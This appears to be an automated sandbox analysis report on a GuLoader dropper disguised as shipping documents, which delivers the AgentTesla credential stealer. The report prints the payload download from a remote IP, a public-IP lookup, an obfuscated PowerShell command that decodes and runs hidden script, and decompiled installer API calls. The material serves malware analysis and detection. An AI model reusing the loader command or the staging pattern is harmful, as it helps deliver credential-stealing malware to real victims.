Sep 27, 2024 18:34:23.783452988 CEST	187	OUT	GET /MQLoRGjADyYzKXcZrWGSjs213.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: 84.38.133.140 Cache-Control: no-cache
Sep 27, 2024 18:34:24.433077097 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Thu, 26 Sep 2024 21:19:26 GMT Accept-Ranges: bytes ETag: "68e9dcc35910db1:0" Server: Microsoft-IIS/8.5 Date: Fri, 27 Sep 2024 16:34:23 GMT Content-Length: 241728 Data Raw: af 31 b0 7f 34 ba 60 65 84 61 98 d6 94 de 28 30 e0 c7 07 b8 38 a4 38 93 86 88 a7 5e 57 72 74 07 c4 8c 64 c9 f4 a4 a5 05 b9 fe c8 32 9f 34 84 7b 73 f4 3f af f8 68 6c f9 76 dd 7c 1e 31 54 27 db 40 7d a1 af bf 42 c0 17 42 81 c0 60 4f b3 51 b8 e1 32 6b 2c 75 f0 21 f7 28 ed 42 68 f6 0f 99 b7 8b 48 bd 12 ff 1f d3 de e6 13 54 7d 00 da 07 2b de 68 cd a0 41 3a c0 f0 ca dd f4 1a 81 74 5f e2 90 db 53 c8 d4 76 98 e9 5d 8a b6 8d 35 74 bf d3 e7 7f 54 7d 60 39 90 b9 44 77 42 18 92 e5 32 09 e1 d7 9c 12 8e 21 62 58 34 f2 b5 a2 48 e6 db 1e 49 e5 8a ed b7 17 ec 59 f2 b5 65 44 c7 22 26 32 87 10 45 7e 4a 84 79 14 c8 0f 67 88 f8 45 69 a3 7d 4c 71 6d 46 65 5c ca 9d 57 6a 4f 94 bc 26 aa fc e4 59 41 4f ce c1 4e 02 45 4a 05 1a 04 2c e9 e0 7b 8f 51 64 09 fa 92 6d 09 6b c4 82 86 07 19 fe 42 b4 f6 a8 e0 fa a5 58 ab a8 ef fc 2f 36 c5 1a f5 61 63 71 50 b6 21 d9 06 7e 53 b7 2a 06 ba a6 64 0e f3 22 7c 88 35 16 b7 fd 33 22 78 c2 8f 32 6e d8 6e 17 02 6b e8 c8 08 81 31 a8 f4 bd 2e 71 11 25 50 6f 52 38 ed 1c c1 ce 9b 0d 6a e4 72 d5 f2 [TRUNCATED] Data Ascii: 14`ea(088^Wrtd24{s?hlv\|1T'@}BB`OQ2k,u!(BhHT}+hA:t_Sv]5tT}`9DwB2!bX4HIYeD"&2E~JygEi}LqmFe\WjO&YAONEJ,{QdmkBX/6acqP!~Sd"\|53"x2nnk1.q%PoR8jr\;=ud8T?N TWEhS1xjGj[^Z^J$&f%.6Y@xL#E;/k}\|0YJ2uHZEoK3v&x 7QBOA1?gQ#2H2dmD%?&EAsNKedR=7-p[l+ZgEySr:s25.$aE]_16~+AK\|USf/uZ9YFY%qItWh++<a\T&t'J qP@8>/A&VzgqC!lNOr`=hgbs/v$;\|e)N(OThNI j2M;s07q1kTszcUU0tTHhEG0H^c%]r]0ee!4cZy<fq Q4[r%!nZe46kd\|I#
Sep 27, 2024 18:34:24.433130026 CEST	1236	IN	Data Raw: 86 63 d5 df 93 9c e1 aa f8 40 33 9d 4d 71 05 90 93 e5 76 ca ef af e8 37 99 a4 68 ff ab ad 4a fd f5 28 77 14 4f cf d9 9f 5d ca fb 9e ef 67 00 5e 6d a9 f3 8c b9 d1 c9 bf c5 2b 22 6d 3f e3 bb 19 b7 25 17 6e 79 70 ba 0b 30 61 dc 04 38 a5 00 d9 70 de Data Ascii: c@3Mqv7hJ(wO]g^m+"m?%nyp0a8p2Ve=Vxi*KpDZj%'L{9_)hz6xbrOz&6vRJ{Z&[rD(;\|1L=JI</'K
Sep 27, 2024 18:34:24.433163881 CEST	448	IN	Data Raw: 54 ee af 81 13 b1 50 8d 23 88 aa c7 47 02 1c 92 b9 af e1 c6 20 b3 4f 35 d9 98 ba c6 7b c1 62 bb 4e 54 83 16 e4 8c ab cf aa aa 62 59 e2 35 89 b5 82 5d f6 15 8a b1 a2 c0 04 39 8e bf e6 3e a9 af 3c 15 37 f3 c6 3c 1a 96 6b aa 69 ed 30 c2 50 c8 74 8d Data Ascii: TP#G O5{bNTbY5]9><7<ki0Ptl 7#gBOk3}e,l#6[2no%`?F`EQ3_K/wRM+ZEnP0ZE8?ySg2}+h:mddezJZJ-"hX2(
Sep 27, 2024 18:34:24.433192968 CEST	1236	IN	Data Raw: 28 1c 97 15 e4 7c 81 4b 3e 3b f4 1a 6a 8b 8c c4 a8 04 5c e5 08 a3 0b a3 a4 91 85 b4 a6 c4 46 57 48 1b 3e 47 a5 c3 39 bb 43 79 58 ef b6 3b 2b 61 05 ef 9f a2 73 3d 17 26 ed ea 00 d5 fc 92 af c9 df 4a aa ab ad 39 ac cf 80 8e e2 bb 33 32 e0 85 21 11 Data Ascii: (\|K>;j\FWH>G9CyX;+as=&J932!<sYaeqP0#L1=9-JZ&(\4qemwJBn+"91[%VQs]i)D\l3$_b'CX\p"[S10n\|\+
Sep 27, 2024 18:34:24.433226109 CEST	1236	IN	Data Raw: 4a c1 82 4f f3 ec a3 3a fd 9c 8e f1 86 d6 43 de 6b 88 b3 11 ac 57 0f 35 7b 21 92 de 6e 96 cf 45 11 03 b4 09 be f7 8e 48 f6 98 58 f7 b1 5c fb 4c e7 93 a5 0c cd db 86 df ef 05 4e e8 6f a3 9c e9 95 9a 08 b2 02 30 f1 a1 68 b8 27 9e b1 8b cf d6 08 df Data Ascii: JO:CkW5{!nEHX\LNo0h'iyRy!E,`cos\|xkq3v)08Dr0m62>>"DQei3=g{Xnj11DB9RAqK
Sep 27, 2024 18:34:24.433258057 CEST	448	IN	Data Raw: 45 db 03 2b c3 8a 59 a4 45 1a 4a 7d d8 7e c5 45 f5 1d 97 2f 77 6a 73 43 15 37 7d da 46 11 81 47 2e 19 3c 65 f7 66 d1 2a 56 6b 34 f6 8c 36 fc 38 1c 29 f8 56 30 51 2b e4 0a 21 a8 00 3e 0e 87 9a 6d 39 48 a7 42 1e 89 73 f9 2f e9 81 a8 4e 37 c4 75 2c Data Ascii: E+YEJ}~E/wjsC7}FG.<ef*Vk468)V0Q+!>m9HBs/N7u,ST?!238xf^ n7nYV7N3Q3Jpg>c7~hb-E&p^L`\|07Vi:g=Z&:KR;y8K^):O'5Bg4
Sep 27, 2024 18:34:24.513298035 CEST	1236	IN	Data Raw: 21 d9 2e 68 53 b5 20 b8 31 a2 64 e0 fe 26 6c fa 20 16 b7 9d 1b 35 68 c2 85 90 90 d4 6d 07 22 6f e8 c8 08 f3 52 a8 f4 cd 8c 1b d8 25 50 10 4a 38 ed 16 53 a2 9b 4b 1f cc 7b d5 f2 e4 09 55 3b ba 4f da 75 2a c3 4c ce 38 c6 a2 f9 43 f5 33 c6 93 55 9a Data Ascii: !.hS 1d&l 5hm"oR%PJ8SK{U;OuL8C3U tWaXmSCxBBj{HP!XVsfgd6%"wPLPfs#[;WE{}vd5Y1uQL;
Sep 27, 2024 18:34:24.513334990 CEST	1236	IN	Data Raw: 06 7e 76 b8 ac ca a1 7d 4b 90 b6 26 cf 37 46 d0 6e 95 b6 30 34 10 cd 49 61 63 2a 1f 17 23 f9 8e b8 a1 f2 80 2e b7 f6 67 0c b6 ea 9f 1a fe 5c 6b 2e f8 4f e5 bd 40 f9 45 89 8b db e4 54 5c 8d c0 53 3e 0b 06 b5 ca fb e7 33 bd 5e db 67 6e e2 52 fe 17 Data Ascii: ~v}K&7Fn04Iac#.g\k.O@ET\S>3^gnRTXNYEKDyEh#pjL7}F<a(VK66)$6w1w7/">pm,B([7p&rP?=2Cl/^B7dY:B3f#Jp>2ac7t
Sep 27, 2024 18:34:24.513367891 CEST	448	IN	Data Raw: b4 88 13 33 32 c4 a0 3f 13 eb 18 a8 73 5d 4a d9 8c 67 d7 f8 95 9f ed 97 08 05 ce 64 99 ae fa b5 12 01 4b 4c 34 3d 67 95 19 5a 3b 85 3e 2f 46 fc f5 08 75 14 b0 cf ab 18 5f ca 8b bc 4f 62 ff 5e 6d 57 7d 8f 39 d1 b7 33 c6 2b 02 e1 c0 e3 3b e7 49 1c Data Ascii: 32?s]JgdKL4=gZ;>/Fu_Ob^mW}93+;IpiPko-dvN1c$"hCp!Z1:JhsY0>9<(B6xFaOz){@y-iE($U:4mIm_%`
Sep 27, 2024 18:34:24.513400078 CEST	1236	IN	Data Raw: 90 bf 43 3b 67 0f 24 9c 03 0e a5 cb 40 9e 02 48 0f 9f bf 60 2c 20 f2 05 31 19 99 9e cd f6 b6 86 4d e4 1b 5b 02 46 2c fa 3d 63 8e e6 7b e5 63 c7 25 eb c4 71 ff 03 7f 43 06 91 22 70 56 ee cf e2 ee 45 e9 e2 d2 3e 57 63 10 73 42 18 41 f8 ac c8 16 33 Data Ascii: C;g$@H`, 1M[F,=c{c%qC"pVE>WcsBA3s)H^xF>}S/34Hgc#k$kgV)O`Ew#j>U"4VgjTX>[AZEJ~>\|jM6D9J <Eg/vk4:$0{0/>m
Sep 27, 2024 18:34:24.513457060 CEST	224	IN	Data Raw: f9 6e 88 62 6b b6 26 31 f5 7a 81 5d fc c9 0a ea a8 08 bd 37 e2 0d 9a ec 3e 4b d8 70 74 89 fd e1 b9 04 58 cb 58 c7 0b de 71 b9 c5 b0 8c d0 c4 3e ee 1b 3a 31 1e e3 3b c8 16 9f 58 ef b8 91 26 63 7e 4c ed c4 74 17 45 0c ae 97 a7 df 7c 82 85 d7 d9 27 Data Ascii: nbk&1z]7>KptXXq>:1;X&c~LtE\|'=cs5w/9$`(bL47 B?BJu1wu]{og,sI?YDYH%npa#eah/UD3&$gk8w(apZ{

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49715	104.26.13.205	443	3876	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:34:25 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-09-27 16:34:25 UTC	211	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 16:34:25 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c9ce6af1aa8c343-EWR
2024-09-27 16:34:25 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Target ID:	0
Start time:	12:32:57
Start date:	27/09/2024
Path:	C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe"
Imagebase:	0x400000
File size:	1'081'112 bytes
MD5 hash:	94C700B33FB2A1AA2BD02F13750CCA75
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:32:58
Start date:	27/09/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle minimized "$Mahjongg=Get-Content 'C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Laccolitic51.Suk151';$Chefen128=$Mahjongg.SubString(11975,3);.$Chefen128($Mahjongg)"
Imagebase:	0x1b0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2916363321.000000000C87B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:32:58
Start date:	27/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:34:10
Start date:	27/09/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\syswow64\msiexec.exe"
Imagebase:	0xb40000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3309605845.0000000024C59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3309605845.0000000024C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3309605845.0000000024C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	23.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	27.6%
Total number of Nodes:	1523
Total number of Limit Nodes:	38

Executed Functions

Function 7347114E Relevance: 116.2, APIs: 57, Strings: 9, Instructions: 700
filestringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 73471A8F: GetCurrentProcess.KERNEL32 ref: 73471A97
Part of subcall function 73471A8F: GetModuleHandleA.KERNEL32(KERNEL32), ref: 73471AA4
Part of subcall function 73471A8F: lstrcpyA.KERNEL32(?,IsWow64Process2), ref: 73471AB5
Part of subcall function 73471A8F: GetProcAddress.KERNEL32(00000000,?), ref: 73471AC0

GetModuleFileNameW.KERNEL32(?,00000104), ref: 734711AA
GlobalAlloc.KERNEL32(00000040,?), ref: 734711C5
CharPrevW.USER32(?,?), ref: 734711F7
GlobalFree.KERNEL32(00000000), ref: 73471226
GetTempFileNameW.KERNEL32(?,734720E8,00000000,00000002), ref: 73471245
CopyFileW.KERNEL32(?,00000002,00000000), ref: 7347125D
CreateFileW.KERNEL32(00000002,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 73471277
CreateFileMappingW.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 73471288
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 73471298
UnmapViewOfFile.KERNEL32(00000000), ref: 734712C9
CloseHandle.KERNEL32(00000000), ref: 734712D0
CloseHandle.KERNEL32(00000000), ref: 734712D3
lstrcatW.KERNEL32(00000000,734720F0), ref: 734712DF
lstrlenW.KERNEL32(00000000), ref: 734712E6
GlobalAlloc.KERNEL32(00000040,?), ref: 7347131B
FindWindowExW.USER32(?,00000000,#32770,00000000), ref: 7347135B
FindWindowExW.USER32(00000000), ref: 7347135E
lstrcmpiW.KERNEL32(00000000,/OEM,00000000), ref: 7347139D
lstrcmpiW.KERNEL32(00000000,/MBCS), ref: 734713B4
DeleteFileW.KERNEL32(00000000,error), ref: 734713EB
GetVersion.KERNEL32 ref: 73471435
GlobalAlloc.KERNEL32(00000040,00001002), ref: 734714A7
lstrcpyW.KERNEL32(?,error), ref: 734714CA
InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 73471502
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 73471516
CreatePipe.KERNELBASE(?,?,?,00000000), ref: 7347153F
CreatePipe.KERNELBASE(?,?,?,00000000), ref: 7347155B
GetStartupInfoW.KERNEL32(?), ref: 7347156D
CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000010,00000000,00000000,?,?), ref: 734715BE
GetTickCount.KERNEL32 ref: 734715CC
WaitForSingleObject.KERNEL32(?,00000000), ref: 734715E7
GetExitCodeProcess.KERNELBASE(?,?), ref: 734715FA
PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 7347160F
GetTickCount.KERNEL32 ref: 73471620
ReadFile.KERNEL32(?,?,00000400,?,00000000), ref: 73471645
IsTextUnicode.ADVAPI32(73473000,-00000400,00000000), ref: 7347167B
IsDBCSLeadByteEx.KERNEL32(?,00000000), ref: 73471713
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000001,?,00000002), ref: 73471745
lstrcpyW.KERNEL32(?, ), ref: 73471784
GlobalReAlloc.KERNEL32(00000000,?,00000042), ref: 73471832
CharNextExA.USER32(?,00000000,00000000), ref: 734718B7
lstrcpyW.KERNEL32(?,error), ref: 734718E2
GetTickCount.KERNEL32 ref: 7347190D
TerminateProcess.KERNEL32(?,000000FF), ref: 73471923
lstrcpyW.KERNEL32(?,timeout), ref: 73471936
Sleep.KERNELBASE(00000064), ref: 7347193F

Part of subcall function 73471B08: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 73471B29
Part of subcall function 73471B08: SendMessageW.USER32(0000104D,00000000,?), ref: 73471B51
Part of subcall function 73471B08: SendMessageW.USER32(00001013,?,00000000), ref: 73471B62

lstrcpyW.KERNEL32(?,error), ref: 7347199F
wsprintfW.USER32 ref: 734719BE
CloseHandle.KERNEL32(?,00000000), ref: 734719DE
CloseHandle.KERNEL32(?), ref: 734719E4
CloseHandle.KERNEL32(?), ref: 734719EA
CloseHandle.KERNEL32(?), ref: 734719F0
CloseHandle.KERNEL32(?), ref: 734719F6
CloseHandle.KERNEL32(?), ref: 734719FC
DeleteFileW.KERNEL32(?), ref: 73471A14
GlobalFree.KERNEL32(00000000), ref: 73471A21
GlobalFree.KERNEL32(00000000), ref: 73471A28

Strings

, xrefs: 7347177E
#32770, xrefs: 73471354
/TIMEOUT=, xrefs: 73471371
/MBCS, xrefs: 734713AE
D, xrefs: 73471400
timeout, xrefs: 73471929
/OEM, xrefs: 73471397
SysListView32, xrefs: 7347134D
error, xrefs: 7347121B, 734713CB, 734714C4, 734718D5, 73471992

Memory Dump Source

Source File: 00000000.00000002.2072565385.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true

Associated: 00000000.00000002.2072539056.0000000073470000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2072595276.0000000073472000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2072657037.0000000073474000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73470000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: File$Handle$Close$Global$lstrcpy$Create$AllocProcess$CharCountFreeMessagePipeSendTick$ByteDeleteDescriptorFindModuleNameSecurityViewWindowlstrcmpi$AddressCodeCopyCurrentDaclExitInfoInitializeLeadMappingMultiNamedNextObjectPeekPrevProcReadSingleSleepStartupTempTerminateTextUnicodeUnmapVersionWaitWidelstrcatlstrlenwsprintf
String ID: $#32770$/MBCS$/OEM$/TIMEOUT=$D$SysListView32$error$timeout
API String ID: 901601142-2772347907
Opcode ID: 5167ff64d2b4f7824bcf5de22ce98b001c09547fc27a37a4c4e73639b5bc121c
Instruction ID: 662ad12d7fbc1892306be1348eaf799f44687f9da2170f705ea5f1212dfd7805
Opcode Fuzzy Hash: 5167ff64d2b4f7824bcf5de22ce98b001c09547fc27a37a4c4e73639b5bc121c
Instruction Fuzzy Hash: 86426C715083859FD719DF65C844BABBBF9FB88300F10492EFA9AE2250E730D945CB66

Function 004036FC Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 416
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403718
GetVersionExW.KERNEL32 ref: 00403741
GetVersionExW.KERNEL32(?), ref: 00403754
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037FC
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403836
OleInitialize.OLE32(00000000), ref: 0040383D
SHGetFileInfoW.SHELL32(004095B0,00000000,?,000002B4,00000000), ref: 0040385C
GetCommandLineW.KERNEL32(00434A00,NSIS Error), ref: 00403871
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe",?,"C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe",00000000), ref: 004038BD
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004039BB
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004039CC
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039D8
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039EC
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004039F4
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403A05
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403A0D
DeleteFileW.KERNELBASE(1033), ref: 00403A27

Part of subcall function 004033ED: GetTickCount.KERNEL32 ref: 00403400
Part of subcall function 004033ED: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe,00000400,?,?,?,?,?), ref: 0040341C

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe",00000000,00000000), ref: 00403ACA
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409600,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe",00000000,00000000), ref: 00403ADD
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe",00000000,00000000), ref: 00403AEC
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe",00000000,00000000), ref: 00403AFB
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B23
DeleteFileW.KERNEL32(0042B538,0042B538,?,00436000,?), ref: 00403B76
CopyFileW.KERNEL32(C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe,0042B538,00000001), ref: 00403B88
CloseHandle.KERNEL32(00000000,0042B538,0042B538,?,0042B538,00000000), ref: 00403BC1

Part of subcall function 00405E1E: CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CC9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00405E26
Part of subcall function 00405E1E: GetLastError.KERNEL32 ref: 00405E30

OleUninitialize.OLE32(00000000), ref: 00403BEF
ExitProcess.KERNEL32 ref: 00403C06
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403C1C
OpenProcessToken.ADVAPI32(00000000), ref: 00403C23
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C38
AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00403C5B
ExitWindowsEx.USER32(00000002,80040002), ref: 00403C80

Part of subcall function 004065F6: CharNextW.USER32(?,004038BC,"C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe",?,"C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe",00000000), ref: 0040660C

Strings

C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer, xrefs: 00403A9A
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403708
.tmp, xrefs: 00403AE2
"C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe", xrefs: 00403878, 004038AE, 004038B6, 00403A44, 00403A50
NSIS Error, xrefs: 00403862
C:\Users\user\Desktop, xrefs: 00403AF1, 00403B32
Low, xrefs: 004039EE
TEMP, xrefs: 00403A00
C:\Users\user\AppData\Local\Temp\, xrefs: 004039B0, 004039B5, 004039CB, 004039D7, 004039E6, 004039F3, 004039FF, 00403A07, 00403AC3, 00403AD8, 00403AE7, 00403AF6, 00403B09, 00403B1E, 00403BD6
\Temp, xrefs: 004039D2
~nsu, xrefs: 00403ABE
UXTHEME, xrefs: 004037F0, 004037F5, 004037FB
TMP, xrefs: 00403A08
1033, xrefs: 00403A22
Error launching installer, xrefs: 00403A6F
SeShutdownPrivilege, xrefs: 00403C32
C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer, xrefs: 004039A0, 00403A8F, 00403B29, 00403B37
C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe, xrefs: 00403B83

Memory Dump Source

Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd

Similarity

API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer$C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer$C:\Users\user\Desktop$C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 1152188737-1333247741
Opcode ID: b60a00851504de891bfd09832caa0eb08e4525dcbc769ec2cebaef67e08d564f
Instruction ID: bd20618887128fe8ff831b6fc98b417d690d9367272f1fc6873584cad7b34aa2
Opcode Fuzzy Hash: b60a00851504de891bfd09832caa0eb08e4525dcbc769ec2cebaef67e08d564f
Instruction Fuzzy Hash: 00D134B12043116AE7207F659C46B2B3AACAB4474EF41453FF586B62D2D7BC9D40CB2D

Function 00404B30 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00404B91
GetDlgItem.USER32(?,000003EE), ref: 00404BA1
GetClientRect.USER32(00000000,?), ref: 00404BDE
GetSystemMetrics.USER32(00000002), ref: 00404BE6
SendMessageW.USER32(00000000,00001061,00000000,00000002), ref: 00404C08
SendMessageW.USER32(00000000,00001036,00004000,00004000), ref: 00404C17
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00404C25
SendMessageW.USER32(00000000,00001026,00000000,?), ref: 00404C2F

Part of subcall function 00405EBA: lstrcatW.KERNEL32(Exec,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,004032C0,00000000), ref: 00406070

SendMessageW.USER32(00000000,00001024,00000000,?), ref: 00404C41
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404C65
ShowWindow.USER32(00000000,00000008), ref: 00404C77
GetDlgItem.USER32(?,000003EC), ref: 00404C99
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00404CAD
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00404CC8
SendMessageW.USER32(00000000,00002001,00000000,?), ref: 00404CD2
ShowWindow.USER32(00000000), ref: 00404D47
ShowWindow.USER32(?,00000008), ref: 00404D4C
GetDlgItem.USER32(?,000003F8), ref: 00404BB1

Part of subcall function 00405503: SendMessageW.USER32(00000028,?,00000001,00405338), ref: 00405511

GetDlgItem.USER32(?,000003EC), ref: 00404CF2
